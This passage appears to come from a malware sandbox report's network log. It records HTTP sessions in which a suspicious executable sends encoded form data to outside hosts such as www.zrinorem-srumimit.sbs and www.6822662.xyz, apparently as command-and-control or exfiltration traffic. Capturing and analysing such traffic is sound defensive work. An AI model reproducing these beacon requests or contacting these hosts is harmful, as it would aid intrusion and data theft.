                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 4f 6d 58 51 54 38 39 72 76 37 6f 64 75 57 49 49 7a 48 6f 65 51 31 43 78 67 79 6d 48 74 70 77 55 73 55 73 4e 42 71 6b 45 6d 76 54 69 70 58 36 2f 58 75 68 51 7a 55 54 62 78 42 31 6b 74 30 35 36 78 4c 74 76 30 76 2b 4c 4d 77 4c 75 79 44 4e 2b 2b 61 50 4d 6c 43 33 70 77 4a 5a 61 39 49 55 72 6a 53 4e 6e 44 6c 56 44 30 30 4b 6b 66 4f 32 62 42 36 39 5a 33 61 45 70 53 64 70 4a 42 66 33 50 73 51 52 76 79 47 6a 4f 41 66 6c 79 4d 73 6b 66 66 4e 56 41 64 71 37 59 74 67 46 4f 4e 70 54 53 5a 64 35 51 46 43 70 32 2f 34 6d 41 79 79 56 47 54 51 75 55 65 74 79 48 5a 79 58 4a 62 54 45 41 64 65 4a 43 6b 43 75 78 4e 2b 59 44 64 78 5a 41 48 56 34 4d 45 77 57 43 65 70 76 35
                                                                        Data Ascii: QhKxhNP=OmXQT89rv7oduWIIzHoeQ1CxgymHtpwUsUsNBqkEmvTipX6/XuhQzUTbxB1kt056xLtv0v+LMwLuyDN++aPMlC3pwJZa9IUrjSNnDlVD00KkfO2bB69Z3aEpSdpJBf3PsQRvyGjOAflyMskffNVAdq7YtgFONpTSZd5QFCp2/4mAyyVGTQuUetyHZyXJbTEAdeJCkCuxN+YDdxZAHV4MEwWCepv5
                                                                        Nov 28, 2024 09:15:26.487931013 CET1236INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 28 Nov 2024 08:15:26 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Last-Modified: Sat, 14 Sep 2024 06:51:15 GMT
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=59BQ5sQlMG%2F1MryFme4dyRB%2BCa6iuggC5IZ32I0NCZ3WUdQmqT9AWANf6fRMOLB%2FajHO7OddhU%2FXNEAmmj%2FzjQYHfTNdbqP5e6zIVLqhhidAyllh57%2BaqtwI3yDjHpEgGZehV18TeL1Wh%2BXJ"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e98e8fc5ba95e7c-EWR
                                                                        Content-Encoding: gzip
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1574&rtt_var=787&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=843&delivery_rate=0&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 32 63 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 04 81 40 22 75 d3 0e b6 26 69 a4 d1 6e 62 12 3f 26 56 04 3c ba c9 35 36 24 76 b0 af 69 c3 c4 ff 8e 9c 64 6d 27 c6 c4 03 ce 8b 73 f7 dd f7 dd d9 77 8e 1f cd 3f cc 16 5f af ce 41 50 59 c0 d5 a7 d7 6f 2f 67 e0 f9 8c 7d 1e cf 18 9b 2f e6 f0 e5 cd e2 dd 5b 08 06 43 b8 26 23 53 62 ec fc bd 07 9e 20 aa 42 c6 36 9b cd 60 33 1e 68 93 b3 c5 47 b6 75 2c 81 0b eb b7 be 6d 63 06 19 65 5e 72 14 b7 22 db b2 50 76 7a 0f 41 30 99 4c ba 38 cf 81 c2 82 ab 7c ea a1 f2 60 b7 4b 62 81 3c 4b 8e 00 00 62 92 54 60 72 3c 3c 86 a7 65 c6 ad 88 e0 bd 26 b8 d0 6b 95 c5 ac 73 76 c0 12 89 83 d3 f3 f1 c7 5a d6 53 6f a6 15 a1 22 7f d1 54 e8 41 da fd 4d 3d c2 2d 31 a7 1f 41 2a b8 b1 48 d3 4f 8b 0b ff d4 63 87 44 8a 97 38 f5 32 b4 a9 91 15 49 ad 0e 18 ae b5 31 cd 0b a8 78 8e a0 34 c1 ca 25 b3 0b b7 d4 14 08 d4 54 d8 6b a5 d6 7a 9d cf ad a5 ce 1a b8 59 69 45 be 95 3f 31 0c 8e ab 6d 04 a9 2e b4 09 1f 9f b4 2b 82 d6 bd e2 a5 2c 9a 90 1b c9 8b 08 1c 95 cf 0b 99 [TRUNCATED]
                                                                        Data Ascii: 2cfTo0~_q@"u&inb?&V<56$vidm'sw?_APYo/g}/[C&#Sb B6`3hGu,mce^r"PvzA0L8|`Kb<KbT`r<<e&ksvZSo"TAM=-1A*HOcD82I1x4%TkzYiE?1m.+,0EEh_;Na<PN&g
                                                                        Nov 28, 2024 09:15:26.488049984 CET390INData Raw: 27 67 17 11 94 dc e4 52 85 70 32 ac b6 30 74 df 21 c1 08 6e 3a 3c 3c 9e 9f bf 9a bd 9c df cd 01 fa 24 f6 22 30 6a 45 5a c3 06 65 2e 28 84 a5 2e b2 08 0a 24 42 e3 db 8a a7 52 e5 21 f8 81 03 de ca fb e3 56 7e 3c a9 b6 07 fa 15 dc 6c 64 46 22 1c 77
                                                                        Data Ascii: 'gRp20t!n:<<$"0jEZe.(.$BR!V~<ldF"w(kQo0vkB:T6>~9~uvPK+1<%Yk4A(f^0MO#6XKYJe^r=f<YaDpk%WnRz_&}_XN@i6h4R


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        23192.168.2.549999172.67.222.69802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:15:27.887921095 CET1860OUTPOST /xyvr/ HTTP/1.1
                                                                        Host: www.zrinorem-srumimit.sbs
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 1244
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.zrinorem-srumimit.sbs
                                                                        Referer: http://www.zrinorem-srumimit.sbs/xyvr/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 4f 6d 58 51 54 38 39 72 76 37 6f 64 75 57 49 49 7a 48 6f 65 51 31 43 78 67 79 6d 48 74 70 77 55 73 55 73 4e 42 71 6b 45 6d 76 62 69 70 46 79 2f 56 4e 35 51 79 55 54 62 76 78 31 6c 74 30 34 67 78 50 41 6d 30 76 7a 30 4d 7a 7a 75 67 77 46 2b 70 62 50 4d 76 43 33 70 38 70 5a 58 69 59 55 79 6a 53 38 50 44 6c 46 44 30 30 4b 6b 66 4e 75 62 58 34 56 5a 37 36 45 75 45 74 70 73 53 50 33 72 73 54 68 56 79 47 76 30 48 76 46 79 4d 4d 30 66 50 76 74 41 41 61 37 4e 71 67 46 57 4e 6f 76 7a 5a 63 56 6d 46 43 63 68 2f 34 4f 41 2b 48 6f 67 55 30 2f 4f 45 75 65 2f 64 6c 44 4b 4c 48 63 4d 58 59 4a 73 37 54 65 76 4e 50 4d 49 61 52 68 53 53 55 56 34 57 47 65 55 62 66 47 48 33 71 5a 51 58 4e 4b 2b 59 78 4b 6d 63 61 70 51 49 61 48 38 4a 38 69 4c 73 6d 68 78 41 30 6e 50 52 2b 41 35 55 74 55 6d 6b 6b 54 67 57 44 59 69 6a 78 4c 62 44 2f 71 59 6c 34 49 6e 37 57 4f 32 47 56 38 35 5a 73 76 78 4b 63 48 67 4a 75 63 72 37 79 44 6e 39 48 4b 73 30 35 56 6c 65 5a 78 67 6e 2f 7a 46 36 4d 75 61 70 2f 41 36 64 54 [TRUNCATED]
                                                                        Data Ascii: QhKxhNP=OmXQT89rv7oduWIIzHoeQ1CxgymHtpwUsUsNBqkEmvbipFy/VN5QyUTbvx1lt04gxPAm0vz0MzzugwF+pbPMvC3p8pZXiYUyjS8PDlFD00KkfNubX4VZ76EuEtpsSP3rsThVyGv0HvFyMM0fPvtAAa7NqgFWNovzZcVmFCch/4OA+HogU0/OEue/dlDKLHcMXYJs7TevNPMIaRhSSUV4WGeUbfGH3qZQXNK+YxKmcapQIaH8J8iLsmhxA0nPR+A5UtUmkkTgWDYijxLbD/qYl4In7WO2GV85ZsvxKcHgJucr7yDn9HKs05VleZxgn/zF6Muap/A6dTu3X7Rp/+2wuSDljTmfWZQkmCTMf1gshHzbtN9A0KYL6C2VEJu08QVObnOPPkLEG359pjCUFcq1bL2rj3f+skm76PlUIP96CxENKJQX7b1InNrgwfbVcYjahqXF+UY5C27bKtH8xXPu26bwFBDZ+BPn09JPCZHBLajjsNYrazQN31zf/7xk9MMZTPNaVZ1gMYScPzBiJuOS1c/W01xz/3s/Ts3xNnVrn2iUacaMozgEIIU5WwZ/XsuDYGEt6/NLSyVM5WowIjw5p+hKiEHt5rr4ePs1uV5C7+7Fp9BHeoyzEd4DIqCgfB7Af03vXQaSTDwNZLKjrVk9fQREl5ONcAS+EUL6sDgWchtjBCenRRqOt+iFe5EH7Q/JDTZNScjNEEXSHKr4a1df5S8MwATaAlID7eQr0QXn6xk4M07hojmT1UuI9uEoccdfSiI4zg+XWR2EbUejbW4DtLpA1NOQ6YwSQ9IuAPJ2a7v2zj6fxmy/cWrFRbhTkKnxj9zmq9yCH6b7OBENLXu/cBjpGcTsGlbwvuPjyFUVfGuUxZ0QSpoPbu/ly31TldzP0vCjr2rQz8NsryeAPxOUtnpBSwB8sI4gn84peJtj7/WAhl5P9cSFF6Ulv15OrrLBYCATJNHuLEoIhCV8i5Pv3auIYUXEZ/M3ylKjH+vCKI+C [TRUNCATED]
                                                                        Nov 28, 2024 09:15:29.245755911 CET1236INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 28 Nov 2024 08:15:29 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Last-Modified: Sat, 14 Sep 2024 06:51:15 GMT
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QVMafmkQv6i9ejtgc1j4zSvMTgutuCa4M%2BNvQb%2BkeHq5LyGcJplKH8NFYGVrzM7Qk7qHnwC7kR43lGr1N%2BXwnA2aUQrIWO7Jx7mm%2FF8zi%2FBNvJ73UCmCKAfnpMnf8MXLT3FtLSGcNw%2BTDtRV"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e98e90d8a35180d-EWR
                                                                        Content-Encoding: gzip
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1463&min_rtt=1463&rtt_var=731&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1860&delivery_rate=0&cwnd=199&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 32 64 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 04 81 40 22 75 d3 0e b6 26 69 a4 d1 6e 62 12 3f 26 56 04 3c ba c9 35 36 24 76 b0 af 69 c3 c4 ff 8e 9c 64 6d 27 c6 c4 03 ce 8b 73 f7 dd f7 dd d9 77 8e 1f cd 3f cc 16 5f af ce 41 50 59 c0 d5 a7 d7 6f 2f 67 e0 f9 8c 7d 1e cf 18 9b 2f e6 f0 e5 cd e2 dd 5b 08 06 43 b8 26 23 53 62 ec fc bd 07 9e 20 aa 42 c6 36 9b cd 60 33 1e 68 93 b3 c5 47 b6 75 2c 81 0b eb b7 be 6d 63 06 19 65 5e 72 14 b7 22 db b2 50 76 7a 0f 41 30 99 4c ba 38 cf 81 c2 82 ab 7c ea a1 f2 60 b7 4b 62 81 3c 4b 8e 00 00 62 92 54 60 72 3c 3c 86 a7 65 c6 ad 88 e0 bd 26 b8 d0 6b 95 c5 ac 73 76 c0 12 89 83 d3 f3 f1 c7 5a d6 53 6f a6 15 a1 22 7f d1 54 e8 41 da fd 4d 3d c2 2d 31 a7 1f 41 2a b8 b1 48 d3 4f 8b 0b ff d4 63 87 44 8a 97 38 f5 32 b4 a9 91 15 49 ad 0e 18 ae b5 31 cd 0b a8 78 8e a0 34 c1 ca 25 b3 0b b7 d4 14 08 d4 54 d8 6b a5 d6 7a 9d cf ad a5 ce 1a b8 59 69 45 be 95 3f 31 0c 8e ab 6d 04 a9 2e b4 09 1f 9f b4 2b 82 d6 bd e2 a5 2c 9a 90 1b c9 8b 08 1c 95 cf 0b 99 [TRUNCATED]
                                                                        Data Ascii: 2daTo0~_q@"u&inb?&V<56$vidm'sw?_APYo/g}/[C&#Sb B6`3hGu,mce^r"PvzA0L8|`Kb<KbT`r<<e&ksvZSo"TAM=-1A*HOcD82I1x4%TkzYiE?1m.+,0EEh_;Na<PN&g'
                                                                        Nov 28, 2024 09:15:29.245919943 CET384INData Raw: 67 17 11 94 dc e4 52 85 70 32 ac b6 30 74 df 21 c1 08 6e 3a 3c 3c 9e 9f bf 9a bd 9c df cd 01 fa 24 f6 22 30 6a 45 5a c3 06 65 2e 28 84 a5 2e b2 08 0a 24 42 e3 db 8a a7 52 e5 21 f8 81 03 de ca fb e3 56 7e 3c a9 b6 07 fa 15 dc 6c 64 46 22 1c 77 b4
                                                                        Data Ascii: gRp20t!n:<<$"0jEZe.(.$BR!V~<ldF"w(kQo0vkB:T6>~9~uvPK+1<%Yk4A(f^0MO#6XKYJe^r=f<YaDpk%WnRz_&}_XN@i6h4R@


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        24192.168.2.550006172.67.222.69802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:15:30.552664042 CET551OUTGET /xyvr/?Yby=d2ydCtHpb8&QhKxhNP=Dk/wQKBXq4hP/zVb9ApyZmDkyzbQqrM0hWgYI5VbiKGV4GeQY6os12Lf5EdpuHYA6f15h+K7XFjq1wIjorrCnH6ZrrhC9s12l00lNHx4+XmTSfuGU54Az/E2dcdiA+66+g== HTTP/1.1
                                                                        Host: www.zrinorem-srumimit.sbs
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:15:31.883143902 CET1236INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 28 Nov 2024 08:15:31 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Last-Modified: Sat, 14 Sep 2024 06:51:15 GMT
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uyxmWUU%2FHsSeGJc9Fk%2BD3Zqywqi1dEgTh0aOr1NA3vyoGXX03ccCMKODSNEnw6NwrqmwV5V%2BxleLJMCIMMMDhdFxXKEkQYDtoKZbh3ZgbB6jbUIFSHy4VH39Zovu51GMyT9SPIKjq7ctnEFk"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e98e91df89e1a24-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1993&min_rtt=1993&rtt_var=996&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=551&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 35 39 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e [TRUNCATED]
                                                                        Data Ascii: 59e<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/c
                                                                        Nov 28, 2024 09:15:31.883244991 CET1061INData Raw: 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65
                                                                        Data Ascii: ss"> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; lette


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        25192.168.2.550007103.249.106.91802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:15:37.988668919 CET793OUTPOST /dnjw/ HTTP/1.1
                                                                        Host: www.6822662.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 208
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.6822662.xyz
                                                                        Referer: http://www.6822662.xyz/dnjw/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 47 4a 47 36 69 56 36 6f 4e 74 77 78 54 66 62 68 53 74 34 78 6f 48 58 76 42 35 4a 6c 41 4b 2b 74 2f 6b 75 4b 66 43 41 6f 4a 59 46 4f 30 38 6e 72 51 46 50 31 59 46 4c 55 45 56 50 55 77 66 30 68 78 36 32 55 76 37 33 6c 53 53 44 48 30 57 47 6a 32 77 4e 6a 6c 74 46 70 47 51 6e 31 57 33 42 50 74 42 69 6a 4a 4d 39 64 74 67 59 73 43 44 31 72 4b 6f 76 51 78 6b 79 4a 76 32 54 6e 68 38 4b 32 69 32 68 6a 4c 38 50 76 32 31 61 4f 45 64 36 4b 74 57 6b 74 54 54 32 61 72 6e 68 4a 65 37 54 34 63 2b 6c 77 62 69 58 44 73 71 49 33 71 55 6a 56 61 64 74 4b 48 34 44 2b 31 30 74 6a 70 72 44 73 49 77 64 5a 44 75 34 3d
                                                                        Data Ascii: QhKxhNP=GJG6iV6oNtwxTfbhSt4xoHXvB5JlAK+t/kuKfCAoJYFO08nrQFP1YFLUEVPUwf0hx62Uv73lSSDH0WGj2wNjltFpGQn1W3BPtBijJM9dtgYsCD1rKovQxkyJv2Tnh8K2i2hjL8Pv21aOEd6KtWktTT2arnhJe7T4c+lwbiXDsqI3qUjVadtKH4D+10tjprDsIwdZDu4=
                                                                        Nov 28, 2024 09:15:39.491436958 CET190INHTTP/1.1 400 Bad Request
                                                                        Server: nginx
                                                                        Date: Thu, 28 Nov 2024 08:15:39 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: d404 Not Found0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        26192.168.2.550008103.249.106.91802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:15:40.655679941 CET813OUTPOST /dnjw/ HTTP/1.1
                                                                        Host: www.6822662.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 228
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.6822662.xyz
                                                                        Referer: http://www.6822662.xyz/dnjw/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 47 4a 47 36 69 56 36 6f 4e 74 77 78 52 2f 4c 68 51 50 51 78 35 33 58 73 66 70 4a 6c 4f 71 2f 6b 2f 6b 71 4b 66 44 30 43 49 74 74 4f 78 70 44 72 54 45 50 31 66 46 4c 55 51 46 50 56 6f 2f 31 74 78 36 79 32 76 35 6a 6c 53 53 58 48 30 58 32 6a 32 44 31 69 6c 39 46 72 66 41 6e 7a 63 58 42 50 74 42 69 6a 4a 4d 34 34 74 67 41 73 43 53 6c 72 59 39 44 58 38 45 79 4b 34 47 54 6e 6c 38 4c 65 69 32 68 4e 4c 34 48 42 32 32 69 4f 45 59 47 4b 6f 58 6b 75 59 54 32 63 76 6e 67 4d 4f 61 79 63 56 4e 42 75 45 55 4f 69 7a 4a 35 4c 72 69 53 2f 41 2f 6c 69 55 59 76 47 6c 6e 6c 55 34 62 69 46 53 54 4e 70 64 35 74 51 51 6a 45 71 34 49 59 76 73 64 59 43 34 35 59 42 36 64 53 61
                                                                        Data Ascii: QhKxhNP=GJG6iV6oNtwxR/LhQPQx53XsfpJlOq/k/kqKfD0CIttOxpDrTEP1fFLUQFPVo/1tx6y2v5jlSSXH0X2j2D1il9FrfAnzcXBPtBijJM44tgAsCSlrY9DX8EyK4GTnl8Lei2hNL4HB22iOEYGKoXkuYT2cvngMOaycVNBuEUOizJ5LriS/A/liUYvGlnlU4biFSTNpd5tQQjEq4IYvsdYC45YB6dSa
                                                                        Nov 28, 2024 09:15:42.222166061 CET190INHTTP/1.1 400 Bad Request
                                                                        Server: nginx
                                                                        Date: Thu, 28 Nov 2024 08:15:41 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: d404 Not Found0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        27192.168.2.550009103.249.106.91802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:15:43.337343931 CET1830OUTPOST /dnjw/ HTTP/1.1
                                                                        Host: www.6822662.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 1244
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.6822662.xyz
                                                                        Referer: http://www.6822662.xyz/dnjw/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 47 4a 47 36 69 56 36 6f 4e 74 77 78 52 2f 4c 68 51 50 51 78 35 33 58 73 66 70 4a 6c 4f 71 2f 6b 2f 6b 71 4b 66 44 30 43 49 72 31 4f 74 50 50 72 56 58 58 31 65 46 4c 55 4d 31 50 51 6f 2f 31 67 78 36 4b 79 76 35 2f 66 53 52 76 48 32 31 2b 6a 2b 53 31 69 38 4e 46 72 43 51 6e 32 57 33 42 61 74 43 61 6e 4a 4d 49 34 74 67 41 73 43 52 74 72 62 6f 76 58 2b 45 79 4a 76 32 54 6a 68 38 4c 6c 69 32 35 37 4c 34 4b 30 33 48 43 4f 42 49 32 4b 71 42 49 75 62 7a 32 65 71 6e 67 71 4f 61 2b 44 56 4e 74 69 45 55 53 45 7a 4a 42 4c 6e 6a 7a 54 65 75 59 38 47 4a 4c 61 76 58 74 77 6b 2f 66 6b 56 53 78 52 63 61 56 2b 51 68 41 7a 35 76 4d 2b 2f 35 45 4b 68 50 51 57 39 61 2f 6f 38 4c 73 41 69 2b 50 2b 76 48 54 30 61 2b 70 5a 64 6c 6c 61 44 56 55 56 72 42 73 54 2b 7a 77 64 59 44 76 74 56 54 76 48 6d 71 38 4d 64 44 47 57 6b 2f 32 76 75 58 34 39 78 62 70 46 56 50 7a 67 43 6f 75 64 2b 69 67 70 71 6e 69 48 77 6d 66 72 34 47 75 42 7a 72 72 70 72 42 76 42 48 53 46 33 79 46 49 51 34 72 39 6c 62 59 35 69 56 35 [TRUNCATED]
                                                                        Data Ascii: QhKxhNP=GJG6iV6oNtwxR/LhQPQx53XsfpJlOq/k/kqKfD0CIr1OtPPrVXX1eFLUM1PQo/1gx6Kyv5/fSRvH21+j+S1i8NFrCQn2W3BatCanJMI4tgAsCRtrbovX+EyJv2Tjh8Lli257L4K03HCOBI2KqBIubz2eqngqOa+DVNtiEUSEzJBLnjzTeuY8GJLavXtwk/fkVSxRcaV+QhAz5vM+/5EKhPQW9a/o8LsAi+P+vHT0a+pZdllaDVUVrBsT+zwdYDvtVTvHmq8MdDGWk/2vuX49xbpFVPzgCoud+igpqniHwmfr4GuBzrrprBvBHSF3yFIQ4r9lbY5iV5OH0RvGbhJdQPAC3pfPXNPfSzzfEto59Vg+7K/Eqzm19NmZN+dpb4VRfhPOfXo4EiXRggtVdq5CIW8N5I8RgAErtHkVGbkCDBEtjzRawKd13W58rptk0fiu2EULDZVP7UU8LkpXhIBUhDlqngvtttHRcLhvQRY2lxfeEliZkzpestlN7QumA1qqj9tRX2vVy4a0UDqxLNv8XOc5puSRZ/osJy4nwQkwH9coNQglJYGtPW55LQuFm649c3JtOE22wT9ntc3m7uJYzdPAszsULqoCX//IzPcpKhnzSOGvuxrAMAIclSv7Ku47PML1y9ZY1bGpGsVFeXbEKYc8vs0lMiKDYZvRhdw9Epb1jKpB3n1OTDzQ7iIo2XAv49Qq+IBtJSgDI4A193Bpb/w6ghNUjc9im5Tf5bWTv6cHBpvBgtjc35murKnGG+Li+QTDI4TngKfTp4YSQZ2DMPhMf8Xp5V+7QCdxSmVmf7OuP6xBcDdPjzaJMgE/dTlp6Ka1YZ2zFVx/CkGXS1rmDX2UAOU0HXLPFVilzl1BMGoxv9WhU92JQtZH4vnk4+sww+7q2yKBam9IUrTSIvus+q1smaJtHC8769fHhjCwv/1sqnqyWRlXUxA4